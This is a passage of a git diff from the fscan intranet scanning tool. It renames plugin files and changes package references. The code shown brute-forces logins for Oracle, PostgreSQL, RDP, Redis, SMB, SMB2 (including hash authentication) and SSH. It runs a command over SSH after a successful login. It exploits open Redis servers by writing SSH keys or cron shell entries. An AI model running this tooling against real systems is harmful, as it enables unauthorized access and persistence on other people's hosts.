if err != nil {
return
}
defer conn.Close()
- err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return
}
diff --git a/Plugins/oracle.go b/Plugins/Oracle.go
similarity index 69%
rename from Plugins/oracle.go
rename to Plugins/Oracle.go
index 37f867c..e956f26 100644
--- a/Plugins/oracle.go
+++ b/Plugins/Oracle.go
@@ -3,32 +3,32 @@ package Plugins
import (
"database/sql"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
_ "github.com/sijms/go-ora/v2"
"strings"
"time"
)
func OracleScan(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return
}
starttime := time.Now().Unix()
- for _, user := range common.Userdict["oracle"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["oracle"] {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := OracleConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
+ if time.Now().Unix()-starttime > (int64(len(Common.Userdict["oracle"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@@ -43,14 +43,14 @@ func OracleConn(info *Config.HostInfo, user string, pass string) (flag bool, err
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
db, err := sql.Open("oracle", dataSourceName)
if err == nil {
- db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
- db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
+ db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
+ db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] oracle %v:%v:%v %v", Host, Port, Username, Password)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
flag = true
}
}
diff --git a/Plugins/portscan.go b/Plugins/PortScan.go
similarity index 87%
rename from Plugins/portscan.go
rename to Plugins/PortScan.go
index c3b291e..c91c3a4 100644
--- a/Plugins/portscan.go
+++ b/Plugins/PortScan.go
@@ -2,7 +2,7 @@ package Plugins
import (
"fmt"
- "github.com/shadow1ng/fscan/common"
+ "github.com/shadow1ng/fscan/Common"
"sort"
"strconv"
"sync"
@@ -16,12 +16,12 @@ type Addr struct {
func PortScan(hostslist []string, ports string, timeout int64) []string {
var AliveAddress []string
- probePorts := common.ParsePort(ports)
+ probePorts := Common.ParsePort(ports)
if len(probePorts) == 0 {
fmt.Printf("[-] parse port %s error, please check your port format\n", ports)
return AliveAddress
}
- noPorts := common.ParsePort(common.NoPorts)
+ noPorts := Common.ParsePort(Common.NoPorts)
if len(noPorts) > 0 {
temp := map[int]struct{}{}
for _, port := range probePorts {
@@ -39,7 +39,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
probePorts = newDatas
sort.Ints(probePorts)
}
- workers := common.Threads
+ workers := Common.Threads
Addrs := make(chan Addr, 100)
results := make(chan string, 100)
var wg sync.WaitGroup
@@ -77,20 +77,20 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
host, port := addr.ip, addr.port
- conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
if err == nil {
defer conn.Close()
address := host + ":" + strconv.Itoa(port)
result := fmt.Sprintf("%s open", address)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
wg.Add(1)
respondingHosts <- address
}
}
func NoPortScan(hostslist []string, ports string) (AliveAddress []string) {
- probePorts := common.ParsePort(ports)
- noPorts := common.ParsePort(common.NoPorts)
+ probePorts := Common.ParsePort(ports)
+ noPorts := Common.ParsePort(Common.NoPorts)
if len(noPorts) > 0 {
temp := map[int]struct{}{}
for _, port := range probePorts {
diff --git a/Plugins/postgres.go b/Plugins/Postgres.go
similarity index 72%
rename from Plugins/postgres.go
rename to Plugins/Postgres.go
index 68681d1..c6e51e7 100644
--- a/Plugins/postgres.go
+++ b/Plugins/Postgres.go
@@ -4,31 +4,31 @@ import (
"database/sql"
"fmt"
_ "github.com/lib/pq"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func PostgresScan(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return
}
starttime := time.Now().Unix()
- for _, user := range common.Userdict["postgresql"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["postgresql"] {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
flag, err := PostgresConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
+ if time.Now().Unix()-starttime > (int64(len(Common.Userdict["postgresql"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@@ -43,12 +43,12 @@ func PostgresConn(info *Config.HostInfo, user string, pass string) (flag bool, e
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("postgres", dataSourceName)
if err == nil {
- db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
+ db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
flag = true
}
}
diff --git a/Plugins/rdp.go b/Plugins/RDP.go
similarity index 89%
rename from Plugins/rdp.go
rename to Plugins/RDP.go
index 4bae7a6..4e80e1f 100644
--- a/Plugins/rdp.go
+++ b/Plugins/RDP.go
@@ -3,8 +3,8 @@ package Plugins
import (
"errors"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"github.com/tomatome/grdp/core"
"github.com/tomatome/grdp/glog"
"github.com/tomatome/grdp/protocol/nla"
@@ -28,25 +28,25 @@ type Brutelist struct {
}
func RdpScan(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return
}
var wg sync.WaitGroup
var signal bool
var num = 0
- var all = len(common.Userdict["rdp"]) * len(common.Passwords)
+ var all = len(Common.Userdict["rdp"]) * len(Common.Passwords)
var mutex sync.Mutex
brlist := make(chan Brutelist)
port, _ := strconv.Atoi(info.Ports)
- for i := 0; i < common.BruteThread; i++ {
+ for i := 0; i < Common.BruteThread; i++ {
wg.Add(1)
- go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
+ go worker(info.Host, Common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, Common.Timeout)
}
- for _, user := range common.Userdict["rdp"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["rdp"] {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
brlist <- Brutelist{user, pass}
}
@@ -78,12 +78,12 @@ func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brute
} else {
result = fmt.Sprintf("[+] RDP %v:%v:%v %v", host, port, user, pass)
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
*signal = true
return
} else {
errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
}
}
}
@@ -126,7 +126,7 @@ func NewClient(host string, logLevel glog.LEVEL) *Client {
}
func (g *Client) Login(domain, user, pwd string, timeout int64) error {
- conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
if err != nil {
return fmt.Errorf("[dial err] %v", err)
}
diff --git a/Plugins/redis.go b/Plugins/Redis.go
similarity index 89%
rename from Plugins/redis.go
rename to Plugins/Redis.go
index 39e6a6b..06d24c5 100644
--- a/Plugins/redis.go
+++ b/Plugins/Redis.go
@@ -3,8 +3,8 @@ package Plugins
import (
"bufio"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"io"
"net"
"os"
@@ -23,22 +23,22 @@ func RedisScan(info *Config.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
}
- if common.IsBrute {
+ if Common.IsBrute {
return
}
- for _, pass := range common.Passwords {
+ for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", "redis", -1)
flag, err := RedisConn(info, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
- if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
+ if time.Now().Unix()-starttime > (int64(len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@@ -49,12 +49,12 @@ func RedisScan(info *Config.HostInfo) (tmperr error) {
func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
- conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return flag, err
}
defer conn.Close()
- err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return flag, err
}
@@ -71,11 +71,11 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
dbfilename, dir, err = getconfig(conn)
if err != nil {
result := fmt.Sprintf("[+] Redis %s %s", realhost, pass)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
return flag, err
} else {
result := fmt.Sprintf("[+] Redis %s %s file:%s/%s", realhost, pass, dir, dbfilename)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
err = Expoilt(realhost, conn)
}
@@ -85,12 +85,12 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
- conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+ conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return flag, err
}
defer conn.Close()
- err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
+ err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return flag, err
}
@@ -107,11 +107,11 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
dbfilename, dir, err = getconfig(conn)
if err != nil {
result := fmt.Sprintf("[+] Redis %s unauthorized", realhost)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
return flag, err
} else {
result := fmt.Sprintf("[+] Redis %s unauthorized file:%s/%s", realhost, dir, dbfilename)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
err = Expoilt(realhost, conn)
}
@@ -119,7 +119,7 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
}
func Expoilt(realhost string, conn net.Conn) error {
- if common.Noredistest {
+ if Common.Noredistest {
return nil
}
flagSsh, flagCron, err := testwrite(conn)
@@ -128,16 +128,16 @@ func Expoilt(realhost string, conn net.Conn) error {
}
if flagSsh == true {
result := fmt.Sprintf("[+] Redis %v like can write /root/.ssh/", realhost)
- common.LogSuccess(result)
- if common.RedisFile != "" {
- writeok, text, err := writekey(conn, common.RedisFile)
+ Common.LogSuccess(result)
+ if Common.RedisFile != "" {
+ writeok, text, err := writekey(conn, Common.RedisFile)
if err != nil {
fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
return err
}
if writeok {
result := fmt.Sprintf("[+] Redis %v SSH public key was written successfully", realhost)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
} else {
fmt.Println("[-] Redis ", realhost, "SSHPUB write failed", text)
}
@@ -146,15 +146,15 @@ func Expoilt(realhost string, conn net.Conn) error {
if flagCron == true {
result := fmt.Sprintf("[+] Redis %v like can write /var/spool/cron/", realhost)
- common.LogSuccess(result)
- if common.RedisShell != "" {
- writeok, text, err := writecron(conn, common.RedisShell)
+ Common.LogSuccess(result)
+ if Common.RedisShell != "" {
+ writeok, text, err := writecron(conn, Common.RedisShell)
if err != nil {
return err
}
if writeok {
result := fmt.Sprintf("[+] Redis %v /var/spool/cron/root was written successfully", realhost)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
} else {
fmt.Println("[-] Redis ", realhost, "cron write failed", text)
}
diff --git a/Plugins/smb.go b/Plugins/SMB.go
similarity index 81%
rename from Plugins/smb.go
rename to Plugins/SMB.go
index 138aef2..785861a 100644
--- a/Plugins/smb.go
+++ b/Plugins/SMB.go
@@ -3,8 +3,8 @@ package Plugins
import (
"errors"
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"github.com/stacktitan/smb/smb"
"strings"
"time"
@@ -13,15 +13,15 @@ import (
// SmbScan 执行SMB服务的认证扫描
func SmbScan(info *Config.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
- if common.IsBrute {
+ if Common.IsBrute {
return nil
}
startTime := time.Now().Unix()
// 遍历用户名和密码字典进行认证尝试
- for _, user := range common.Userdict["smb"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["smb"] {
+ for _, pass := range Common.Passwords {
// 替换密码中的用户名占位符
pass = strings.Replace(pass, "{user}", user, -1)
@@ -31,30 +31,30 @@ func SmbScan(info *Config.HostInfo) (tmperr error) {
if success && err == nil {
// 认证成功,记录结果
var result string
- if common.Domain != "" {
+ if Common.Domain != "" {
result = fmt.Sprintf("[✓] SMB认证成功 %v:%v Domain:%v\\%v Pass:%v",
- info.Host, info.Ports, common.Domain, user, pass)
+ info.Host, info.Ports, Common.Domain, user, pass)
} else {
result = fmt.Sprintf("[✓] SMB认证成功 %v:%v User:%v Pass:%v",
info.Host, info.Ports, user, pass)
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
return err
} else {
// 认证失败,记录错误
errorMsg := fmt.Sprintf("[x] SMB认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass,
strings.ReplaceAll(err.Error(), "\n", ""))
- common.LogError(errorMsg)
+ Common.LogError(errorMsg)
tmperr = err
// 检查是否需要中断扫描
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
// 检查是否超时
- timeoutLimit := int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout
+ timeoutLimit := int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout
if time.Now().Unix()-startTime > timeoutLimit {
return err
}
@@ -74,7 +74,7 @@ func SmblConn(info *Config.HostInfo, user string, pass string, signal chan struc
Port: 445,
User: user,
Password: pass,
- Domain: common.Domain,
+ Domain: Common.Domain,
Workstation: "",
}
@@ -105,7 +105,7 @@ func doWithTimeOut(info *Config.HostInfo, user string, pass string) (flag bool,
select {
case <-signal:
return flag, err
- case <-time.After(time.Duration(common.Timeout) * time.Second):
+ case <-time.After(time.Duration(Common.Timeout) * time.Second):
return false, errors.New("[!] SMB连接超时")
}
}
diff --git a/Plugins/smb2.go b/Plugins/SMB2.go
similarity index 81%
rename from Plugins/smb2.go
rename to Plugins/SMB2.go
index eadf67d..76b25fe 100644
--- a/Plugins/smb2.go
+++ b/Plugins/SMB2.go
@@ -2,8 +2,8 @@ package Plugins
import (
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"net"
"os"
"strings"
@@ -15,7 +15,7 @@ import (
// SmbScan2 执行SMB2服务的认证扫描,支持密码和哈希两种认证方式
func SmbScan2(info *Config.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
- if common.IsBrute {
+ if Common.IsBrute {
return nil
}
@@ -23,7 +23,7 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) {
startTime := time.Now().Unix()
// 使用哈希认证模式
- if len(common.HashBytes) > 0 {
+ if len(Common.HashBytes) > 0 {
return smbHashScan(info, hasprint, startTime)
}
@@ -33,8 +33,8 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) {
// smbHashScan 使用哈希进行认证扫描
func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
- for _, user := range common.Userdict["smb"] {
- for _, hash := range common.HashBytes {
+ for _, user := range Common.Userdict["smb"] {
+ for _, hash := range Common.HashBytes {
success, err, printed := Smb2Con(info, user, "", hash, hasprint)
if printed {
hasprint = true
@@ -47,11 +47,11 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
logFailedAuth(info, user, "", hash, err)
- if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.HashBytes)) {
+ if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.HashBytes)) {
return err
}
- if len(common.Hash) > 0 {
+ if len(Common.Hash) > 0 {
break
}
}
@@ -61,8 +61,8 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
// smbPasswordScan 使用密码进行认证扫描
func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
- for _, user := range common.Userdict["smb"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["smb"] {
+ for _, pass := range Common.Passwords {
pass = strings.ReplaceAll(pass, "{user}", user)
success, err, printed := Smb2Con(info, user, pass, []byte{}, hasprint)
if printed {
@@ -76,11 +76,11 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro
logFailedAuth(info, user, pass, []byte{}, err)
- if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.Passwords)) {
+ if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.Passwords)) {
return err
}
- if len(common.Hash) > 0 {
+ if len(Common.Hash) > 0 {
break
}
}
@@ -91,20 +91,20 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro
// logSuccessfulAuth 记录成功的认证
func logSuccessfulAuth(info *Config.HostInfo, user, pass string, hash []byte) {
var result string
- if common.Domain != "" {
+ if Common.Domain != "" {
result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v Domain:%v\\%v ",
- info.Host, info.Ports, common.Domain, user)
+ info.Host, info.Ports, Common.Domain, user)
} else {
result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v User:%v ",
info.Host, info.Ports, user)
}
if len(hash) > 0 {
- result += fmt.Sprintf("Hash:%v", common.Hash)
+ result += fmt.Sprintf("Hash:%v", Common.Hash)
} else {
result += fmt.Sprintf("Pass:%v", pass)
}
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
// logFailedAuth 记录失败的认证
@@ -112,22 +112,22 @@ func logFailedAuth(info *Config.HostInfo, user, pass string, hash []byte, err er
var errlog string
if len(hash) > 0 {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v",
- info.Host, info.Ports, user, common.Hash, err)
+ info.Host, info.Ports, user, Common.Hash, err)
} else {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err)
}
errlog = strings.ReplaceAll(errlog, "\n", " ")
- common.LogError(errlog)
+ Common.LogError(errlog)
}
// shouldStopScan 检查是否应该停止扫描
func shouldStopScan(err error, startTime int64, totalAttempts int) bool {
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return true
}
- if time.Now().Unix()-startTime > (int64(totalAttempts) * common.Timeout) {
+ if time.Now().Unix()-startTime > (int64(totalAttempts) * Common.Timeout) {
return true
}
@@ -138,7 +138,7 @@ func shouldStopScan(err error, startTime int64, totalAttempts int) bool {
func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) {
// 建立TCP连接
conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:445", info.Host),
- time.Duration(common.Timeout)*time.Second)
+ time.Duration(Common.Timeout)*time.Second)
if err != nil {
return false, fmt.Errorf("连接失败: %v", err), false
}
@@ -147,7 +147,7 @@ func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, haspr
// 配置NTLM认证
initiator := smb2.NTLMInitiator{
User: user,
- Domain: common.Domain,
+ Domain: Common.Domain,
}
// 设置认证方式(哈希或密码)
@@ -202,9 +202,9 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte,
var result string
// 构建基础信息
- if common.Domain != "" {
+ if Common.Domain != "" {
result = fmt.Sprintf("[*] SMB2共享信息 %v:%v Domain:%v\\%v ",
- info.Host, info.Ports, common.Domain, user)
+ info.Host, info.Ports, Common.Domain, user)
} else {
result = fmt.Sprintf("[*] SMB2共享信息 %v:%v User:%v ",
info.Host, info.Ports, user)
@@ -212,12 +212,12 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte,
// 添加认证信息
if len(hash) > 0 {
- result += fmt.Sprintf("Hash:%v ", common.Hash)
+ result += fmt.Sprintf("Hash:%v ", Common.Hash)
} else {
result += fmt.Sprintf("Pass:%v ", pass)
}
// 添加共享列表
result += fmt.Sprintf("可用共享: %v", shares)
- common.LogSuccess(result)
+ Common.LogSuccess(result)
}
diff --git a/Plugins/ssh.go b/Plugins/SSH.go
similarity index 73%
rename from Plugins/ssh.go
rename to Plugins/SSH.go
index d1a5d09..204ab52 100644
--- a/Plugins/ssh.go
+++ b/Plugins/SSH.go
@@ -2,8 +2,8 @@ package Plugins
import (
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
- "github.com/shadow1ng/fscan/common"
"golang.org/x/crypto/ssh"
"io/ioutil"
"net"
@@ -13,15 +13,15 @@ import (
// SshScan 执行SSH服务的认证扫描
func SshScan(info *Config.HostInfo) (tmperr error) {
- if common.IsBrute {
+ if Common.IsBrute {
return
}
startTime := time.Now().Unix()
// 遍历用户名和密码字典进行认证尝试
- for _, user := range common.Userdict["ssh"] {
- for _, pass := range common.Passwords {
+ for _, user := range Common.Userdict["ssh"] {
+ for _, pass := range Common.Passwords {
// 替换密码中的用户名占位符
pass = strings.Replace(pass, "{user}", user, -1)
@@ -33,22 +33,22 @@ func SshScan(info *Config.HostInfo) (tmperr error) {
// 记录失败信息
errlog := fmt.Sprintf("[x] SSH认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err)
- common.LogError(errlog)
+ Common.LogError(errlog)
tmperr = err
// 检查是否需要中断扫描
- if common.CheckErrs(err) {
+ if Common.CheckErrs(err) {
return err
}
// 检查是否超时
- timeoutLimit := int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout
+ timeoutLimit := int64(len(Common.Userdict["ssh"])*len(Common.Passwords)) * Common.Timeout
if time.Now().Unix()-startTime > timeoutLimit {
return err
}
// 如果指定了SSH密钥,则不进行密码尝试
- if common.SshKey != "" {
+ if Common.SshKey != "" {
return err
}
}
@@ -60,9 +60,9 @@ func SshScan(info *Config.HostInfo) (tmperr error) {
func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
// 准备认证方法
var auth []ssh.AuthMethod
- if common.SshKey != "" {
+ if Common.SshKey != "" {
// 使用SSH密钥认证
- pemBytes, err := ioutil.ReadFile(common.SshKey)
+ pemBytes, err := ioutil.ReadFile(Common.SshKey)
if err != nil {
return false, fmt.Errorf("读取密钥失败: %v", err)
}
@@ -81,7 +81,7 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
config := &ssh.ClientConfig{
User: user,
Auth: auth,
- Timeout: time.Duration(common.Timeout) * time.Second,
+ Timeout: time.Duration(Common.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil
},
@@ -97,23 +97,23 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
flag = true
// 处理认证成功的情况
- if common.Command != "" {
+ if Common.Command != "" {
// 执行指定命令
- output, _ := session.CombinedOutput(common.Command)
- if common.SshKey != "" {
- common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v",
+ output, _ := session.CombinedOutput(Common.Command)
+ if Common.SshKey != "" {
+ Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, string(output)))
} else {
- common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v",
+ Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v",
info.Host, info.Ports, user, pass, string(output)))
}
} else {
// 仅记录认证成功
- if common.SshKey != "" {
- common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v",
+ if Common.SshKey != "" {
+ Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v",
info.Host, info.Ports))
} else {
- common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v",
+ Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v",
info.Host, info.Ports, user, pass))
}
}
diff --git a/Plugins/scanner.go b/Plugins/Scanner.go
similarity index 75%
rename from Plugins/scanner.go
rename to Plugins/Scanner.go
index 4c7cff6..385640d 100644
--- a/Plugins/scanner.go
+++ b/Plugins/Scanner.go
@@ -2,9 +2,9 @@ package Plugins
import (
"fmt"
+ "github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/WebScan/lib"
- "github.com/shadow1ng/fscan/common"
"strconv"
"strings"
"sync"
@@ -14,19 +14,19 @@ func Scan(info Config.HostInfo) {
fmt.Println("[*] 开始信息扫描...")
// 本地信息收集模块
- if common.Scantype == "localinfo" {
- ch := make(chan struct{}, common.Threads)
+ if Common.Scantype == "localinfo" {
+ ch := make(chan struct{}, Common.Threads)
wg := sync.WaitGroup{}
AddScan("localinfo", info, &ch, &wg)
wg.Wait()
- common.LogWG.Wait()
- close(common.Results)
- fmt.Printf("[✓] 扫描完成 %v/%v\n", common.End, common.Num)
+ Common.LogWG.Wait()
+ close(Common.Results)
+ fmt.Printf("[✓] 扫描完成 %v/%v\n", Common.End, Common.Num)
return
}
// 解析目标主机IP
- Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts)
+ Hosts, err := Common.ParseIP(info.Host, Common.HostFile, Common.NoHosts)
if err != nil {
fmt.Printf("[!] 解析主机错误: %v\n", err)
return
@@ -34,29 +34,29 @@ func Scan(info Config.HostInfo) {
// 初始化配置
lib.Inithttp()
- ch := make(chan struct{}, common.Threads)
+ ch := make(chan struct{}, Common.Threads)
wg := sync.WaitGroup{}
var AlivePorts []string
- if len(Hosts) > 0 || len(common.HostPort) > 0 {
+ if len(Hosts) > 0 || len(Common.HostPort) > 0 {
// ICMP存活性检测
- if (common.NoPing == false && len(Hosts) > 1) || common.Scantype == "icmp" {
- Hosts = CheckLive(Hosts, common.Ping)
+ if (Common.NoPing == false && len(Hosts) > 1) || Common.Scantype == "icmp" {
+ Hosts = CheckLive(Hosts, Common.Ping)
fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts))
- if common.Scantype == "icmp" {
- common.LogWG.Wait()
+ if Common.Scantype == "icmp" {
+ Common.LogWG.Wait()
return
}
}
// 端口扫描策略
- AlivePorts = executeScanStrategy(Hosts, common.Scantype)
+ AlivePorts = executeScanStrategy(Hosts, Common.Scantype)
// 处理自定义端口
- if len(common.HostPort) > 0 {
- AlivePorts = append(AlivePorts, common.HostPort...)
- AlivePorts = common.RemoveDuplicate(AlivePorts)
- common.HostPort = nil
+ if len(Common.HostPort) > 0 {
+ AlivePorts = append(AlivePorts, Common.HostPort...)
+ AlivePorts = Common.RemoveDuplicate(AlivePorts)
+ Common.HostPort = nil
fmt.Printf("[+] 总计存活端口: %d\n", len(AlivePorts))
}
@@ -70,37 +70,37 @@ func Scan(info Config.HostInfo) {
}
info.Host, info.Ports = hostParts[0], hostParts[1]
- executeScanTasks(info, common.Scantype, &ch, &wg)
